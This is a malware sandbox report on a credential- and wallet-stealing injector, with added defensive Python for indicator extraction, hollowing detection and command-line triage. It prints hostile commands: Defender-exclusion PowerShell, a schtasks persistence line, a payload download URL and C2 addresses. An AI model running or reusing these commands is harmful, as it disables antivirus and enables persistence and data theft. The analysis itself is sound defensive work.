MALICIOUS DYNAMIC ANALYSIS REPORT # X-Ray Vision for Malware / 36. Classifications: Injector Spyware.


MALICIOUS

Classifications: Injector Spyware

Threat Names: - Verdict Reason: -

Sample Type Windows Exe (x86-32)

File Name atom.exe

ID #3210845

MD5 9589c93c73bb3529f9ba711a27998fd2

SHA1 d5536307d1e5861bbdef3f36a7d012cdeaffb5a0

SHA256 c4f35392a0fc133f2607176175e370673855e25ae8ea1814b705289d3b00f978

File Size 1416.00 KB

Report Created 2021-12-31 15:01 (UTC+1)

Target Environment win7_64_sp1_en_mso2016 | exe


OVERVIEW

VMRay Threat Identifiers (33 rules, 75 matches)

Score | Category | Operation | Count | Classification

5/5 | Data Collection | Tries to read cached credentials of various applications | 1 | Spyware

Tries to read sensitive data of: Opera, K-Meleon, Total Commander, Cyberfox, The Bat!, Mozilla Thunderbird, Comodo IceDragon, Electrum Bitcoin Wallet, Internet Explorer / Edge, Windows Mail, Exodus Cryptocurrency Wallet, Mozilla Firefox.

4/5 | Injection | Writes into the memory of another process | 1 | Injector

(Process #1) atom.exe modifies memory of (process #2) applaunch.exe.

4/5 | Injection | Modifies control flow of another process | 1 | -

(Process #1) atom.exe alters context of (process #2) applaunch.exe.

3/5 | Defense Evasion | Tries to detect the presence of antivirus software | 1 | -

(Process #2) applaunch.exe tries to detect antivirus software via WMI query: "SELECT * FROM AntivirusProduct".

3/5 | Defense Evasion | Tries to detect the presence of anti-spyware software | 1 | -

(Process #2) applaunch.exe tries to detect anti-spyware software via WMI query: "SELECT * FROM AntiSpyWareProduct".

3/5 | Defense Evasion | Tries to detect the presence of firewall software | 1 | -

(Process #2) applaunch.exe tries to detect firewall via WMI query: "SELECT * FROM FirewallProduct".

(The AntivirusProduct, AntiSpyWareProduct and FirewallProduct classes live in the root\SecurityCenter2 WMI namespace; queries against that namespace from a process that is not a management tool are a cheap detection point for this stage.)

3/5 | Data Collection | Reads cryptocurrency wallet locations | 2 | -

(Process #2) applaunch.exe tries to read the cryptocurrency wallet "Electrum Bitcoin Wallet" for "BTC".

(Process #2) applaunch.exe tries to read the cryptocurrency wallet "Exodus Cryptocurrency Wallet".

2/5 | Anti Analysis | Tries to detect virtual machine | 2 | -

(Process #1) atom.exe reads out system information, commonly used to detect "VirtualBox" via registry. (Key is "HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__").

Multiple processes are possibly trying to detect a VM via rdtsc.

2/5 | Anti Analysis | Tries to detect application sandbox | 2 | -

(Process #1) atom.exe tries to detect "Comodo Sandbox" by checking for existence of module "cmdvrt32.dll".

(Process #1) atom.exe tries to detect "Sandboxie" by checking for existence of module "SbieDll.dll".

2/5 | Discovery | Reads network adapter information | 1 | -

(Process #2) applaunch.exe reads the network adapters' addresses by API.

2/5 | Discovery | Executes WMI query | 8 | -

2/5 | Discovery | Collects hardware properties | 1 | -

(Process #2) applaunch.exe queries hardware properties via WMI.

2/5 | Data Collection | Reads sensitive ftp data | 1 | -

(Process #2) applaunch.exe tries to read sensitive data of ftp application "Total Commander" by file.

2/5 | Data Collection | Reads sensitive mail data | 3 | -

(Process #2) applaunch.exe tries to read sensitive data of mail application "The Bat!" by file.

(Process #2) applaunch.exe tries to read sensitive data of mail application "Windows Mail" by file.

(Process #2) applaunch.exe tries to read sensitive data of mail application "Mozilla Thunderbird" by file.

2/5 | Data Collection | Reads sensitive browser data | 6 | -

(Process #2) applaunch.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Opera" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Mozilla Firefox" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "K-Meleon" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Comodo IceDragon" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Cyberfox" by file.

2/5 | Discovery | Queries OS version via WMI | 1 | -

(Process #2) applaunch.exe queries OS version via WMI.

2/5 | Discovery | Enumerates running processes | 1 | -

(Process #2) applaunch.exe enumerates running processes via WMI.

2/5 | Task Scheduling | Schedules task | 1 | -

Schedules task for command "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe", to be triggered by Logon.

2/5 | Task Scheduling | Schedules task via schtasks | 1 | -

Schedules task "services" via the schtasks command line utility. (The task re-launches the dropped copy of build.exe from the roaming profile at every logon; see processes #11 and #12 for the full command line.)

2/5 | Anti Analysis | Makes direct system call to possibly evade hooking based sandboxes | 16 | -

(Process #6) build.exe and (process #14) services.exe each make direct system calls to "NtOpenFile", "NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection", "NtClose", "NtProtectVirtualMemory", "NtQueryVirtualMemory" and "NtAllocateVirtualMemory" (8 calls per process).

1/5 | Hide Tracks | Creates process with hidden window | 4 | -

(Process #1) atom.exe starts (process #2) applaunch.exe with a hidden window.

(Process #6) build.exe starts (process #7) cmd.exe with a hidden window.

(Process #6) build.exe starts (process #11) cmd.exe with a hidden window.

(Process #6) build.exe starts (process #13) cmd.exe with a hidden window.

1/5 | Obfuscation | Reads from memory of another process | 1 | -

(Process #1) atom.exe reads from (process #2) applaunch.exe.

1/5 | Obfuscation | Creates a page with write and execute permissions | 1 | -

(Process #1) atom.exe allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.

1/5 | Privilege Escalation | Enables process privilege | 1 | -

(Process #2) applaunch.exe enables process privilege "SeDebugPrivilege".

1/5 | Discovery | Possibly does reconnaissance | 1 | -

(Process #2) applaunch.exe tries to gather information about application "Steam" by registry.

1/5 | Execution | Drops PE file | 1 | -

(Process #2) applaunch.exe drops file "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe".

1/5 | Execution | Executes dropped PE file | 1 | -

Executes dropped file "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe".

1/5 | Network Connection | Performs DNS request | 4 | -

(Process #2) applaunch.exe resolves host name "vataeagene.xyz" to IP "94.140.115.160".

(Process #2) applaunch.exe resolves host name "api.ip.sb" to IP "172.67.75.172".

(Process #2) applaunch.exe resolves host name "github.com" to IP "140.82.121.4".

(Process #2) applaunch.exe resolves host name "raw.githubusercontent.com" to IP "185.199.110.133".

1/5 | Network Connection | Connects to remote host | 4 | -

(Process #2) applaunch.exe opens an outgoing TCP connection to host "140.82.121.4:443".

(Process #2) applaunch.exe opens an outgoing TCP connection to host "185.199.110.133:443".

(Process #2) applaunch.exe opens an outgoing TCP connection to host "94.140.115.160:81".

(Process #2) applaunch.exe opens an outgoing TCP connection to host "172.67.75.172:443".

1/5 | Network Connection | Tries to connect using an uncommon port | 1 | -

(Process #2) applaunch.exe tries to connect to TCP port 81 at 94.140.115.160.

1/5 | Obfuscation | Resolves API functions dynamically | 2 | -

(Process #1) atom.exe crashed.

Mitre ATT&CK Matrix

Initial Access: -
Execution: #T1047 Windows Management Instrumentation; #T1053 Scheduled Task
Persistence: #T1053 Scheduled Task
Privilege Escalation: #T1053 Scheduled Task
Defense Evasion: #T1497 Virtualization/Sandbox Evasion; #T1143 Hidden Window; #T1045 Software Packing; #T1027 Obfuscated Files or Information
Credential Access: #T1081 Credentials in Files
Discovery: #T1497 Virtualization/Sandbox Evasion; #T1012 Query Registry; #T1016 System Network Configuration Discovery; #T1082 System Information Discovery; #T1083 File and Directory Discovery; #T1063 Security Software Discovery; #T1124 System Time Discovery
Lateral Movement: -
Collection: #T1119 Automated Collection; #T1005 Data from Local System
Command and Control: #T1065 Uncommonly Used Port
Exfiltration: -
Impact: -

The IDs follow the ATT&CK numbering from before sub-techniques were introduced. T1081, T1143, T1045, T1063 and T1065 have since been retired in favour of T1552.001, T1564.003, T1027.002, T1518.001 and T1571 respectively; map them before loading this report into a current ATT&CK Navigator layer.

Sample Information

Analysis Information

ID #3210845

MD5 9589c93c73bb3529f9ba711a27998fd2

SHA1 d5536307d1e5861bbdef3f36a7d012cdeaffb5a0

SHA256 c4f35392a0fc133f2607176175e370673855e25ae8ea1814b705289d3b00f978

SSDeep 24576:sE9/HxpgaqxonW5L4gHQzzxfitKZ/NLV7XDBP9hXiAN3D2XklPD3BJkEaHNYK34y:sI/Hfqx9sgHizYtuFFzBlhXJ3D2XklP0

ImpHash f6af73011d9ad7cbccf66eb190442910

File Name atom.exe

File Size 1416.00 KB

Sample Type Windows Exe (x86-32)

Has Macros

Creation Time 2021-12-31 15:01 (UTC+1)

Analysis Duration 00:04:00

Termination Reason Sample crashed

Number of Monitored Processes 10

Execution Successful False

Reputation Enabled

WHOIS Enabled

Built-in AV Enabled

Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of AV Matches 0

YARA Enabled

YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of YARA Matches 0


Screenshots truncated


NETWORK

General

3352.68 KB total sent, 8412.76 KB total received
2 ports: 81, 443
5 contacted IP addresses
0 URLs extracted, 0 files downloaded
0 malicious hosts detected

DNS

5 DNS requests for 4 domains, 1 nameserver contacted
0 total requests returned errors

HTTP/S

3 URLs contacted, 3 servers
3 sessions, 130.96 KB sent, 8393.98 KB received

HTTP Requests (Method | URL | Dest. IP | Dest. Port | Status Code | Response Size | Verdict)

GET https://github.com/gay225/hui/raw/main/build.exe - - 0 bytes NA
GET https://raw.githubusercontent.com/gay225/hui/main/build.exe - - 0 bytes NA
GET https://api.ip.sb/ip - - 0 bytes NA

The per-request destination, status and size fields are empty for all three HTTPS requests; only the session totals are available. Those totals (8393.98 KB received over three HTTPS sessions) are consistent with the 6850.50 KB build.exe having been fetched through the GitHub raw URL (a github.com/<user>/<repo>/raw/<branch>/<file> URL redirects to raw.githubusercontent.com), which the "0 files downloaded" counter does not capture because the transfer was inside TLS.

DNS Requests (Type | Hostname | Response Code | Resolved IPs | CNames | Verdict)

A | vataeagene.xyz | NoError | 94.140.115.160 | - | NA
A | api.ip.sb, api.ip.sb.cdn.cloudflare.net | NoError | 172.67.75.172, 104.26.13.31, 104.26.12.31 | api.ip.sb.cdn.cloudflare.net | NA
A | github.com | NoError | 140.82.121.4 | - | NA
A | raw.githubusercontent.com | NoError | 185.199.110.133, 185.199.111.133, 185.199.108.133, 185.199.109.133 | - | NA
- | api.ip.sb | - | 172.67.75.172, 104.26.13.31, 104.26.12.31 | - | NA

Of the four domains, only vataeagene.xyz (contacted on TCP port 81, with no HTTP request parsed) is not shared GitHub or Cloudflare infrastructure; it and the GitHub raw URL that delivered build.exe are the sample-specific network indicators from this run. api.ip.sb is a public "what is my IP" service, commonly used by stealers to record the victim's external address.
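As an added example (not part of the VMRay report or its vendor's tooling), the following Python joins the DNS answers and connection list above into an indicator list that separates sample-specific endpoints from shared GitHub/Cloudflare infrastructure and from addresses that were resolved but never contacted. The DNS and connection rows are transcribed from this report; the SHARED_HOSTS set, the COMMON_PORTS set and the scope labels are the example's own assumptions.

```python
"""Turn a sandbox report's DNS answers and connections into a scoped IOC list.

Added example; not code from the VMRay report. DNS_ANSWERS and CONNECTIONS are
transcribed from the report's Network section. SHARED_HOSTS and COMMON_PORTS are
assumptions of this example.
"""
import ipaddress

# Hostname -> resolved IPs, as listed under "DNS Requests".
DNS_ANSWERS = {
    "vataeagene.xyz": ["94.140.115.160"],
    "api.ip.sb": ["172.67.75.172", "104.26.13.31", "104.26.12.31"],
    "github.com": ["140.82.121.4"],
    "raw.githubusercontent.com": ["185.199.110.133", "185.199.111.133",
                                  "185.199.108.133", "185.199.109.133"],
}

# (ip, port, protocol) as listed under "Connects to remote host", plus the
# resolver the sandbox used for DNS (listed under the IP artifacts as 192.168.0.1).
CONNECTIONS = [
    ("140.82.121.4", 443, "tcp"),
    ("185.199.110.133", 443, "tcp"),
    ("94.140.115.160", 81, "tcp"),
    ("172.67.75.172", 443, "tcp"),
    ("192.168.0.1", 53, "udp"),
]

# Assumption: hosts whose IPs are shared by many unrelated tenants. For these the
# only usable indicator is the full URL (or repository path), never the address.
SHARED_HOSTS = frozenset({"github.com", "raw.githubusercontent.com", "api.ip.sb"})
COMMON_PORTS = frozenset({80, 443})


def build_iocs(dns_answers, connections, shared_hosts=SHARED_HOSTS):
    """One record per observed connection, with the scope at which it is safe to block."""
    ip_to_host = {ip: host for host, ips in dns_answers.items() for ip in ips}
    records = []
    for ip, port, proto in connections:
        if ipaddress.ip_address(ip).is_private:
            continue                       # lab plumbing (resolver, gateway), never an IOC
        host = ip_to_host.get(ip)
        flags = []
        if host is None:
            flags.append("no_dns_lookup")  # address hard-coded in the sample
        if port not in COMMON_PORTS:
            flags.append("uncommon_port")
        if host in shared_hosts:
            scope = "url"                  # block the specific URL, not the address or domain
        elif host is None:
            scope = "ip"
        else:
            scope = "domain"               # domain and ip:port are both sample-specific
        records.append({"ip": ip, "port": port, "proto": proto,
                        "host": host, "scope": scope, "flags": flags})
    return records


def resolved_but_not_contacted(dns_answers, connections):
    """Addresses DNS returned that never received a connection: report as resolved, not contacted."""
    contacted = {ip for ip, _, _ in connections}
    return {ip for ips in dns_answers.values() for ip in ips} - contacted


if __name__ == "__main__":
    for r in build_iocs(DNS_ANSWERS, CONNECTIONS):
        print(f"{r['host'] or '-':26} {r['ip']:16} {r['proto']}/{r['port']:<4} "
              f"scope={r['scope']:7} {','.join(r['flags'])}")
    print("resolved only:", sorted(resolved_but_not_contacted(DNS_ANSWERS, CONNECTIONS)))
```

Run against the report's data this yields one "domain"-scoped record (vataeagene.xyz, 94.140.115.160:81, flagged uncommon_port), three "url"-scoped records for the GitHub and Cloudflare endpoints, and five resolved-only addresses that must not be listed as contacted.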

BEHAVIOR

Process Graph (parent/child relations reconstructed from the PID / Parent PID fields of the per-process sections below)

#1 atom.exe (Sample Start)
 |-- Modify Memory, Modify Control Flow --> #2 applaunch.exe
 `-- #2 applaunch.exe (Child Process)
      `-- #6 build.exe (Child Process)
           |-- #7 cmd.exe (Child Process)
           |    |-- #8 powershell.exe (Child Process)
           |    `-- #10 powershell.exe (Child Process)
           |-- #11 cmd.exe (Child Process)
           |    `-- #12 schtasks.exe (Child Process)
           `-- #13 cmd.exe (Child Process)
                `-- #14 services.exe (Child Process)

Process #1: atom.exe

ID 1
File Name c:\users\keecfmwgj\desktop\atom.exe
Command Line "C:\Users\kEecfMwgj\Desktop\atom.exe"
Initial Working Directory C:\Users\kEecfMwgj\Desktop\
Monitor Start Time 49096 (Reason: Analysis Target)
Unmonitor End Time 88024 (Reason: Crashed)
Monitor duration 38.93s
Return Code 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION)
PID 3788
Parent PID 912
Bitness 32 Bit

Host Behavior (Type: Count)
Module 319; Registry 11; Keyboard 1; System 7; - 1; File 5; Process 1; Environment 1; - 3; - 8

Process #2: applaunch.exe

ID 2
File Name c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Initial Working Directory C:\Users\kEecfMwgj\Desktop\
Monitor Start Time 78257 (Reason: Child Process)
Unmonitor End Time 157959 (Reason: Terminated)
Monitor duration 79.70s
Return Code 0
PID 3816
Parent PID 3788
Bitness 32 Bit

Injection Information (3) (Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count)

Modify Memory | #1: c:\users\keecfmwgj\desktop\atom.exe | 0xed0 | 0x400000 (4194304) | 0x20000 | 1
Modify Memory | #1: c:\users\keecfmwgj\desktop\atom.exe | 0xed0 | 0xfffde008 (4294828040) | 0x4 | 1
Modify Control Flow | #1: c:\users\keecfmwgj\desktop\atom.exe | 0xed0 / 0xeec | 0x779f01c4 (2006909380) | - | 1

The sequence is the classic process-hollowing (RunPE) pattern: a 0x20000-byte write at 0x400000, the default image base of a 32-bit PE, one pointer-sized (4-byte) write elsewhere in the target, the size a PEB ImageBaseAddress patch would have, and then a context change on the target's initial thread (TID 0xeec), which is how hollowed code is started. AppLaunch.exe is a signed Microsoft .NET host, so everything attributed to process #2 below (credential theft, WMI discovery, the download of build.exe) is the injected payload running under a trusted image name, not AppLaunch.exe's own behaviour. The timeline agrees: atom.exe crashed at 88024 ms, about ten seconds after starting AppLaunch.exe, while the hollowed process ran on until 157959 ms.

Dropped Files (1) (File Name | File Size | SHA256 | YARA Match)

C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe | 6850.50 KB | 0b73ec50b09ea9929e0db0a60135e211b8f80c424a151706531cb9876617d1fe | -

Host Behavior (Type: Count)
Registry 279; Process 1; File 358; System 152; - 13; User 3; Module 68; Environment 8; Keyboard 3; COM 111; - 11; Window 2; HTTPS 3

Network Behavior (Type: Count)
DNS 5; TCP 4
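As an added example (not code from the VMRay report or its vendor), the following Python classifies an injection-event sequence of the kind shown in the Injection Information table, distinguishing process hollowing (image-sized write followed by a thread-context change on the target) from a plain thread hijack or a write with no execution primitive. The three events are transcribed from the table above; the page-size threshold, the 32-bit default image base and the rule labels are the example's own assumptions.

```python
"""Classify a sandbox injection-event sequence (process hollowing vs. other injection).

Added example; not code from the VMRay report or its vendor. EVENTS is transcribed
from the "Injection Information" table of process #2; the thresholds, the
default-image-base constant and the labels are this example's own assumptions.
"""
from dataclasses import dataclass
from typing import Optional

PAGE = 0x1000
DEFAULT_IMAGE_BASE_X86 = 0x400000   # linker default for 32-bit PE images (assumption)


@dataclass
class InjectionEvent:
    kind: str                  # "write" (Modify Memory) or "context" (Modify Control Flow)
    source: str
    target: str
    address: int
    size: int = 0              # bytes written; 0 for a context change
    tid: Optional[int] = None  # target thread of a context change


EVENTS = [
    InjectionEvent("write", "atom.exe", "applaunch.exe", 0x400000, 0x20000),
    InjectionEvent("write", "atom.exe", "applaunch.exe", 0xFFFDE008, 0x4),
    InjectionEvent("context", "atom.exe", "applaunch.exe", 0x779F01C4, tid=0xEEC),
]


def classify(events):
    """Return (label, evidence) for an ordered list of InjectionEvent."""
    writes = [e for e in events if e.kind == "write"]
    last_write = max((i for i, e in enumerate(events) if e.kind == "write"), default=-1)
    # A context change only counts as the execution step if it follows the payload write.
    hijacks = [e for i, e in enumerate(events) if e.kind == "context" and i > last_write]
    # Page-aligned writes of at least a page look like a mapped image or section, not a stub.
    image_writes = [w for w in writes if w.address % PAGE == 0 and w.size >= PAGE]
    # Pointer-sized writes are what a PEB.ImageBaseAddress patch looks like (4 bytes on x86).
    pointer_patches = [w for w in writes if w.size in (4, 8)]
    evidence = {
        "image_write_bytes": sum(w.size for w in image_writes),
        "image_write_at_default_base": any(w.address == DEFAULT_IMAGE_BASE_X86 for w in image_writes),
        "pointer_patches": len(pointer_patches),
        "hijacked_tid": hijacks[0].tid if hijacks else None,
    }
    if image_writes and hijacks:
        label = "process_hollowing"      # image-sized write, then thread context set on the target
    elif writes and hijacks:
        label = "thread_hijack"          # small write (stub/shellcode), then context change
    elif writes:
        label = "memory_write_only"      # no execution primitive observed yet
    else:
        label = "none"
    return label, evidence


if __name__ == "__main__":
    print(classify(EVENTS))
```

For the three events above the classifier returns process_hollowing with a 0x20000-byte image write at the default base, one pointer patch and TID 0xeec as the hijacked thread; feeding it the same events with the context change first yields only memory_write_only, because a context change that precedes the write is not the execution step of the payload.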

Process #6: build.exe

ID 6
File Name c:\users\keecfmwgj\appdata\local\temp\build.exe
Command Line "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe"
Initial Working Directory C:\Users\kEecfMwgj\AppData\Local\Temp\
Monitor Start Time 155392 (Reason: Child Process)
Unmonitor End Time 253556 (Reason: Terminated)
Monitor duration 98.16s
Return Code 0
PID 3988
Parent PID 3816
Bitness 64 Bit

Dropped Files (1) (File Name | File Size | SHA256 | YARA Match)

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe | 6850.50 KB | 0b73ec50b09ea9929e0db0a60135e211b8f80c424a151706531cb9876617d1fe | -

services.exe is a byte-for-byte copy of build.exe (same size and SHA256); the name mimics the legitimate C:\Windows\System32\services.exe, so "services.exe running from a user profile path" is a direct hunting pivot for this second stage.

Host Behavior (Type: Count)
Module 37; File 14; System 12; Environment 1; Registry 1; - 3; Process 3

Process #7: cmd.exe

ID 7
File Name c:\windows\system32\cmd.exe
Command Line "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAK... ...BuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
(The command line is shown truncated in the report; the two PowerShell children, processes #8 and #10, carry the full encoded commands.)
Initial Working Directory C:\Windows\system32\
Monitor Start Time 179505 (Reason: Child Process)
Unmonitor End Time 238724 (Reason: Terminated)
Monitor duration 59.22s
Return Code 1
PID 4028
Parent PID 3988
Bitness 64 Bit

Host Behavior (Type: Count)
Module 1; Environment 16; File 22; Process 2

Process #8: powershell.exe

ID 8
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Decoded (-EncodedCommand is base64 of UTF-16LE): Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
This adds the user profile and the entire system drive to the Microsoft Defender exclusion list. Note the return code of 1: the exclusions were most likely not applied in this run (Add-MpPreference requires an elevated context, and the Defender PowerShell module is not present on the Windows 7 analysis image); on an administrator's workstation with Windows 8 or later the command would take effect.
Initial Working Directory C:\Windows\system32\
Monitor Start Time 180069 (Reason: Child Process)
Unmonitor End Time 218362 (Reason: Terminated)
Monitor duration 38.29s
Return Code 1
PID 4056
Parent PID 4028
Bitness 64 Bit

Host Behavior (Type: Count)
System 15; Module 3; File 188; Environment 23; Registry 2; - 14

Process #10: powershell.exe

ID 10
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Decoded: Add-MpPreference -ExclusionExtension @('exe','dll') -Force
This excludes every .exe and .dll file from Defender scanning, complementing the path exclusions requested by process #8. As with process #8, the return code of 1 indicates the command did not succeed on the analysis image.
Initial Working Directory C:\Windows\system32\
Monitor Start Time 217370 (Reason: Child Process)
Unmonitor End Time 238279 (Reason: Terminated)
Monitor duration 20.91s
Return Code 1
PID 2968
Parent PID 4028
Bitness 64 Bit

Host Behavior (Type: Count)
System 15; Module 3; File 165; Environment 19; Registry 2; - 14

Process #11: cmd.exe

ID 11
File Name c:\windows\system32\cmd.exe
Command Line "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time 238280 (Reason: Child Process)
Unmonitor End Time 240547 (Reason: Terminated)
Monitor duration 2.27s
Return Code 0
PID 1796
Parent PID 3988
Bitness 64 Bit

Host Behavior (Type: Count)
Module 1; Environment 8; File 7; Process 1

Process #12: schtasks.exe

ID 12
File Name c:\windows\system32\schtasks.exe
Command Line schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"
The task runs the dropped copy at every interactive logon (/sc onlogon), overwrites any existing task of the same name (/f) and asks for the highest run level the account holds (/rl highest), which yields an elevated token only if the logged-on user is an administrator. The return code of 0 confirms the task was registered in this run.
Initial Working Directory C:\Windows\system32\
Monitor Start Time 238437 (Reason: Child Process)
Unmonitor End Time 240518 (Reason: Terminated)
Monitor duration 2.08s
Return Code 0
PID 180
Parent PID 1796
Bitness 64 Bit

Host Behavior (Type: Count)
System 5; Module 8; COM 1; File 3
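The PowerShell -EncodedCommand lines of processes #7, #8 and #10 and the schtasks persistence of processes #11 and #12 are the parts of this process tree that a triage script would want to recognise automatically. As an added example (not code from the VMRay report or its vendor), the following Python decodes -EncodedCommand payloads (base64 of UTF-16LE) and flags Defender exclusion tampering and logon-triggered tasks that point at a user-writable path. The three command lines are transcribed from processes #8, #10 and #12 (with the line-wrap spaces removed from the base64); the detection rules and the USER_WRITABLE pattern are this example's own assumptions.

```python
"""Triage process command lines from a sandbox report.

Added example; not code from the VMRay report or its vendor. The command lines
are transcribed from processes #8, #10 and #12 of this report. The detection
rules and the USER_WRITABLE pattern are this example's own assumptions.
"""
import base64
import re

# Matches -e, -ec, -enc, -EncodedCommand and other prefixes PowerShell accepts,
# but not -ExecutionPolicy (the letter after "e" must be "c" or "n").
ENCODED_RE = re.compile(r'-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]+)', re.I)
EXCLUSION_RE = re.compile(r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Extension|Process|IpAddress)", re.I)
SCHTASKS_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b(.*)", re.I)
# Locations a standard user can write to; a logon task pointing here persists a dropped file.
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp|Users\\Public)\\", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # truncated, mis-padded or not base64 at all
        return None


def triage(cmdline):
    """Return (dec" + "oded_script_or_None, findings) for one command line."""
    findings = []
    script = decode_encoded_command(cmdline)
    if script is not None:
        findings.append("powershell_encoded_command")
    text = script if script is not None else cmdline   # rules run on the decoded script when present
    if EXCLUSION_RE.search(text):
        findings.append("defender_exclusion_added")
    m = SCHTASKS_RE.search(cmdline)
    if m:
        args = m.group(1)
        findings.append("schtasks_create")
        if re.search(r"/sc\s+onlogon\b", args, re.I):
            findings.append("task_trigger_logon")
        if re.search(r"/rl\s+highest\b", args, re.I):
            findings.append("task_runlevel_highest")
        tr = re.search(r'/tr\s+"?([^"]+)', args, re.I)
        if tr and USER_WRITABLE.search(tr.group(1)):
            findings.append("task_binary_in_user_writable_path")
    return script, findings


# Command lines transcribed from the report (processes #8, #10 and #12).
PS_EXCLUSION_PATH = ('powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"')
PS_EXCLUSION_EXT = ('powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="')
SCHTASKS = r'schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"'

if __name__ == "__main__":
    for line in (PS_EXCLUSION_PATH, PS_EXCLUSION_EXT, SCHTASKS):
        script, findings = triage(line)
        print(findings, "->", script or line)
```

The decoder is deliberately strict: a truncated payload such as the one shown for process #7 decodes to None instead of garbage, so a rule never fires on a half-decoded string, and the schtasks rules work on the raw command line because that tool has no encoding to undo.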

Process #13: cmd.exe

ID 13
File Name c:\windows\system32\cmd.exe
Command Line "cmd" cmd /c "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time 252044 (Reason: Child Process)
Unmonitor End Time 262657 (Reason: Terminated)
Monitor duration 10.61s
Return Code 1073807364 (0x40010004, DBG_TERMINATE_PROCESS: the process was terminated externally at the end of the analysis rather than exiting on its own)
PID 1752
Parent PID 3988
Bitness 64 Bit

Host Behavior (Type: Count)
Module 1; Environment 3; File 1; Process 1

Process #14: services.exe

ID 14
File Name c:\users\keecfmwgj\appdata\roaming\microsoft\services.exe
Command Line C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time 252733 (Reason: Child Process)
Unmonitor End Time 262644 (Reason: Terminated)
Monitor duration 9.91s
Return Code 1073807364 (0x40010004, DBG_TERMINATE_PROCESS: terminated externally together with its parent)
PID 3368
Parent PID 1752
Bitness 64 Bit

Host Behavior (Type: Count)
Module 27; File 5; System 9; Environment 1

Only about ten seconds of services.exe were monitored before the analysis ended, and its first actions (direct system calls to the section-mapping and memory-protection APIs, see the Anti Analysis identifiers) match those of build.exe; what the second stage does after its unpacking phase is not covered by this report.

ARTIFACTS

File (SHA256 | File Names | Category | File Size | MIME Type | Operations | Verdict)

c4f35392a0fc133f2607176175e370673855e25ae8ea1814b705289d3b00f978 | C:\Users\kEecfMwgj\Desktop\atom.exe | Sample File | 1416.00 KB | application/vnd.microsoft.portable-executable | Access | MALICIOUS
